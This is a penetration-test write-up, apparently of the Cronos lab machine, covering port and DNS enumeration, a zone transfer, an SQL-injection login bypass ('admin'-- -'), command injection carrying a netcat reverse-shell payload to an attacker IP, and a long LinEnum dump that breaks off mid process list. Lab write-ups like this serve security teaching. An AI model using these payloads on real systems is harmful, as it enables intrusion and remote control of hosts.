CronOs Write-up

todocait — Tue, 16 May 2023 15:44:02 +0000

# Pentest Report – Cronos

## Enumeration

### Port Scan

#### TCP

“`bash
sudo nmap $1 -A -p- -sC -sV -Pn -oN nmap
Nmap scan report for 10.10.10.13
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_ 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
“`

#### UDP

“`less
sudo nmap $1 -sU -A –top-ports 25 –min-rate 5000 -oN nmap_udp
Nmap scan report for 10.10.10.13
Host is up (0.042s latency).

#### Vulnerability Scan

“`less
sudo nmap $1 -p- –script vuln –min-rate 800 -Pn -oN nmap_vuln
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
| http-enum:
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on ‘apache/2.4.18 (ubuntu)’
|_ /js/: Potentially interesting directory w/ listing on ‘apache/2.4.18 (ubuntu)’
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
“`

### DNS Enumeration

#### Query Domain Name

“`bash
nslookup
> server
Default server: 10.10.11.166
Address: 10.10.11.166#53
>
;; communications error to 10.10.11.166#53: timed out
166.11.10.10.in-addr.arpa name = trick.htb
>
“`

#### Get DNS Records

“`bash
nslookup -type=ANY site.site.com 0.0.0.0
nslookup -type=any cronos.htb 10.10.10.13
Server: 10.10.10.13
Address: 10.10.10.13#53

cronos.htb
origin = cronos.htb
mail addr = admin.cronos.htb
serial = 3
refresh = 604800
retry = 86400
expire = 2419200
minimum = 604800
cronos.htb nameserver = ns1.cronos.htb.
Name: cronos.htb
Address: 10.10.10.13
“`

#### Zone Transfer

“`bash
dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sat May 06 09:52:03 CEST 2023
;; XFR size: 7 records (messages 1, bytes 203)
“`

### HTTP

#### Directory Brute Forcing

“`bash
dirsearch -u http://{IP}/ -r –deep-recursive -F -t 100 -x 404,403,400,500
Target: http://cronos.htb:80/

[09:54:22] Starting:
[09:54:27] 200 – 924B – /js
[09:54:33] 200 – 925B – /css
[09:54:34] 200 – 0B – /favicon.ico
[09:54:35] 200 – 2KB – /index.php
[09:54:36] 200 – 924B – /js/ (Added to queue)
[09:54:41] 200 – 24B – /robots.txt
[09:54:44] 200 – 914B – /web.config
[09:54:45] Starting: js/
[09:54:53] 200 – 278KB – /js/app.js

Target: http://ns1.cronos.htb:80/

[09:54:30] Starting:
[09:54:43] 200 – 11KB – /index.html

Target: http://admin.cronos.htb:80/

[09:54:53] Starting:
[09:55:02] 200 – 0B – /config.php
[09:55:05] 200 – 2KB – /index.php
[09:55:05] 200 – 2KB – /index.php/login/

Target: http://www.cronos.htb:80/

[09:55:33] Starting:
[09:55:34] 200 – 928B – /js
[09:55:42] 200 – 929B – /css
[09:55:43] 200 – 0B – /favicon.ico
[09:55:44] 200 – 2KB – /index.php
[09:55:45] 200 – 928B – /js/ (Added to queue)
[09:55:48] 200 – 24B – /robots.txt
[09:55:51] 200 – 914B – /web.config
“`

#### Subdomain Enumeration

“`bash
gobuster vhost -u http://cronos.htb -t 100 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt –append-domain -q -k –no-error
Found: admin.cronos.htb Status: 200 [Size: 1547]
“`

#### Spider/Crawling

“`sh
gospider -s http://0.0.0.0 -t 50 -d 2 -o .

“`

#### Fingerprint

Apache httpd 2.4.18 | PHP

## Exploitation

### Authentication Bypass – Login Page

By injecting SQL code into the login page located at `admin.cronos.htb`, we are able to bypass authentication, granting us access to `/welcome.php`.

Payload: `admin’– -`

### RCE – Insufficient Input Sanitization

If we intercept our post request in `welcome.php`, we can edit our command to be anything and the server will execute the command.

![[Pasted image 20230506101023.png]]

If we inject a URL encoded reverse shell payload in the command field, we can get a reverse shell.

“`http
command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+10.10.14.13+445+>/tmp/f
“`

“`bash
nc -nlvp 445
listening on [any] 445 …
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53720
bash: cannot set terminal process group (1321): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$
“`

## Privilege Escalation

### Full Linux Shell

“`bash
python -c ‘import pty;pty.spawn(“/bin/bash”)’
# script /dev/null -c bash

target@target:~/.ssh$ ^Z
zsh: suspended nc -nlvp 1234

stty raw -echo; fg
[1] + continued nc -nlvp 1234

target@target:~/.ssh$ export TERM=xterm
“`

### Enumeration

#### Linenum Output

“`bASH
www-data@cronos:/tmp$ ./linenum.sh
./linenum.sh

### SYSTEM ##############################################
[-] Kernel information:
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.4.0-72-generic (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=”Ubuntu 16.04.2 LTS”
NAME=”Ubuntu”
VERSION=”16.04.2 LTS (Xenial Xerus)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 16.04.2 LTS”
VERSION_ID=”16.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

[-] Hostname:
cronos

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Fri Jun 17 13:33:44 +0300 2022
noulis pts/0 10.10.14.141 Thu Jul 27 01:39:12 +0300 2017

[-] Who else is logged on:
11:14:21 up 26 min, 0 users, load average: 0.00, 0.08, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(mysql) gid=111(mysql) groups=111(mysql)
uid=108(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=109(uuidd) gid=113(uuidd) groups=113(uuidd)
uid=110(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
uid=112(bind) gid=119(bind) groups=119(bind)

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
bind:x:112:119::/var/cache/bind:/bin/false

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K May 10 2022 .
drwxr-xr-x 23 root root 4.0K May 10 2022 ..
drwxr-xr-x 4 noulis noulis 4.0K May 10 2022 noulis

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LANG=C
APACHE_RUN_GROUP=www-data
SHLVL=2
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /bin
drwxr-xr-x 2 root root 12288 May 10 2022 /sbin
drwxr-xr-x 2 root root 20480 May 10 2022 /usr/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /usr/local/bin
drwxr-xr-x 2 root root 4096 May 10 2022 /usr/local/sbin
drwxr-xr-x 2 root root 12288 May 10 2022 /usr/sbin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen

[-] Current umask value:
0022
u=rwx,g=rx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r–r– 1 root root 797 Apr 9 2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r–r– 1 root root 102 Apr 6 2016 .placeholder
-rw-r–r– 1 root root 589 Jul 16 2014 mdadm
-rw-r–r– 1 root root 670 Mar 1 2016 php
-rw-r–r– 1 root root 191 Mar 22 2017 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r–r– 1 root root 102 Apr 6 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 6 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 27 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 13 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r–r– 1 root root 102 Apr 6 2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r–r– 1 root root 102 Apr 6 2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 May 10 2022 .
drwxr-xr-x 95 root root 4096 May 10 2022 ..
-rw-r–r– 1 root root 102 Apr 6 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don’t have to run the `crontab’
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts –report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts –report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2023-05-06 12:00:10 EEST 45min left Sat 2023-05-06 10:48:09 EEST 26min ago snapd.refresh.timer snapd.refresh.service
Sat 2023-05-06 22:59:17 EEST 11h left Sat 2023-05-06 10:48:09 EEST 26min ago apt-daily.timer apt-daily.service
Sun 2023-05-07 11:03:20 EEST 23h left Sat 2023-05-06 11:03:20 EEST 11min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.
Enable thorough tests to see inactive timers

### NETWORKING ##########################################
[-] Network and IP info:
ens160 Link encap:Ethernet HWaddr 00:50:56:b9:85:18
inet addr:10.10.10.13 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:8518/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:8518/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:449972 errors:0 dropped:0 overruns:0 frame:0
TX packets:360429 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:51524923 (51.5 MB) TX bytes:142920379 (142.9 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2331 errors:0 dropped:0 overruns:0 frame:0
TX packets:2331 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:226377 (226.3 KB) TX bytes:226377 (226.3 KB)

[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:9d:31 [ether] on ens160

[-] Nameserver(s):
nameserver 10.10.10.2
nameserver 8.8.8.8

[-] Default route:
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens160

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 10.10.10.13:53 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 10.10.10.13:53 0.0.0.0:* –
udp 0 0 127.0.0.1:53 0.0.0.0:* –

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 0.5 37936 6032 ? Ss 10:48 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 10:48 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:48 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:48 0:00 [kworker/0:0H] root 7 0.0 0.0 0 0 ? S 10:48 0:00 [rcu_sched] root 8 0.0 0.0 0 0 ? S 10:48 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 10:48 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S 10:48 0:00 [watchdog/0] root 11 0.0 0.0 0 0 ? S 10:48 0:00 [kdevtmpfs] root 12 0.0 0.0 0 0 ? S< 10:48 0:00 [netns] root 13 0.0 0.0 0 0 ? S< 10:48 0:00 [perf] root 14 0.0 0.0 0 0 ? S 10:48 0:00 [khungtaskd] root 15 0.0 0.0 0 0 ? S< 10:48 0:00 [writeback] root 16 0.0 0.0 0 0 ? SN 10:48 0:00 [ksmd] root 17 0.0 0.0 0 0 ? SN 10:48 0:00 [khugepaged] root 18 0.0 0.0 0 0 ? S< 10:48 0:00 [crypto] root 19 0.0 0.0 0 0 ? S< 10:48 0:00 [kintegrityd] root 20 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 21 0.0 0.0 0 0 ? S< 10:48 0:00 [kblockd] root 22 0.0 0.0 0 0 ? S< 10:48 0:00 [ata_sff] root 23 0.0 0.0 0 0 ? S< 10:48 0:00 [md] root 24 0.0 0.0 0 0 ? S< 10:48 0:00 [devfreq_wq] root 28 0.0 0.0 0 0 ? S 10:48 0:00 [kswapd0] root 29 0.0 0.0 0 0 ? S< 10:48 0:00 [vmstat] root 30 0.0 0.0 0 0 ? S 10:48 0:00 [fsnotify_mark] root 31 0.0 0.0 0 0 ? S 10:48 0:00 [ecryptfs-kthrea] root 47 0.0 0.0 0 0 ? S< 10:48 0:00 [kthrotld] root 48 0.0 0.0 0 0 ? S< 10:48 0:00 [acpi_thermal_pm] root 49 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 50 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 51 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 52 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 53 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 54 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 55 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 56 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 57 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_0] root 58 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_0] root 59 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_1] root 67 0.0 0.0 0 0 ? S< 10:48 0:00 [ipv6_addrconf] root 80 0.0 0.0 0 0 ? S< 10:48 0:00 [deferwq] root 81 0.0 0.0 0 0 ? S< 10:48 0:00 [charger_manager] root 131 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_2] root 132 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_2] root 133 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_3] root 134 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_3] root 135 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_4] root 136 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_5] root 137 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_4] root 138 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_5] root 139 0.0 0.0 0 0 ? S< 10:48 0:00 [vmw_pvscsi_wq_4] root 140 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_6] root 141 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_6] root 143 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 144 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_7] root 147 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_7] root 150 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_8] root 151 0.0 0.0 0 0 ? S< 10:48 0:00 [kpsmoused] root 154 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_8] root 157 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_9] root 160 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_9] root 162 0.0 0.0 0 0 ? S< 10:48 0:00 [ttm_swap] root 164 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_10] root 167 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_10] root 168 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_11] root 170 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_11] root 177 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_12] root 178 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_12] root 179 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_13] root 180 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_13] root 184 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_14] root 186 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_14] root 189 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_15] root 191 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_15] root 192 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_16] root 195 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_16] root 196 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_17] root 198 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_17] root 199 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_18] root 201 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_18] root 204 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_19] root 206 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_19] root 208 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_20] root 211 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_20] root 212 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_21] root 214 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_21] root 216 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_22] root 218 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_22] root 220 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_23] root 222 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_23] root 223 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_24] root 224 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_24] root 225 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_25] root 226 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_25] root 227 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_26] root 228 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_26] root 229 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_27] root 230 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_27] root 231 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_28] root 232 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_28] root 233 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_29] root 234 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_29] root 235 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_30] root 236 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_30] root 237 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_31] root 238 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_31] root 239 0.0 0.0 0 0 ? S 10:48 0:00 [scsi_eh_32] root 240 0.0 0.0 0 0 ? S< 10:48 0:00 [scsi_tmf_32] root 265 0.0 0.0 0 0 ? S 10:48 0:00 [kworker/u2:28] root 266 0.0 0.0 0 0 ? S 10:48 0:00 [kworker/u2:29] root 339 0.0 0.0 0 0 ? S< 10:48 0:00 [raid5wq] root 364 0.0 0.0 0 0 ? S< 10:48 0:00 [kdmflush] root 365 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 375 0.0 0.0 0 0 ? S< 10:48 0:00 [kdmflush] root 376 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 393 0.0 0.0 0 0 ? S< 10:48 0:00 [bioset] root 421 0.0 0.0 0 0 ? S 10:48 0:00 [jbd2/dm-0-8] root 422 0.0 0.0 0 0 ? S< 10:48 0:00 [ext4-rsv-conver] root 466 0.0 0.0 0 0 ? S< 10:48 0:00 [kworker/0:1H] root 478 0.0 0.0 0 0 ? S< 10:48 0:00 [iscsi_eh] root 488 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_addr] root 490 0.0 0.3 28500 3180 ? Ss 10:48 0:00 /lib/systemd/systemd-journald root 498 0.0 0.0 0 0 ? S 10:48 0:00 [kauditd] root 503 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_mcast] root 509 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_nl_sa_wq] root 513 0.0 0.0 0 0 ? S< 10:48 0:00 [ib_cm] root 514 0.0 0.0 0 0 ? S< 10:48 0:00 [iw_cm_wq] root 515 0.0 0.1 102968 1536 ? Ss 10:48 0:00 /sbin/lvmetad -f root 517 0.0 0.0 0 0 ? S< 10:48 0:00 [rdma_cm] root 540 0.0 0.3 44700 4040 ? Ss 10:48 0:00 /lib/systemd/systemd-udevd root 782 0.0 0.0 0 0 ? S< 10:48 0:00 [ext4-rsv-conver] systemd+ 819 0.0 0.2 100324 2264 ? Ssl 10:48 0:00 /lib/systemd/systemd-timesyncd message+ 929 0.0 0.3 42940 3896 ? Ss 10:48 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation root 951 0.0 0.2 29008 2756 ? Ss 10:48 0:00 /usr/sbin/cron -f root 952 0.0 0.5 275860 6056 ? Ssl 10:48 0:00 /usr/lib/accountsservice/accounts-daemon root 953 0.0 0.1 95368 1392 ? Ssl 10:48 0:00 /usr/bin/lxcfs /var/lib/lxcfs/ syslog 954 0.0 0.3 256396 3268 ? Ssl 10:48 0:00 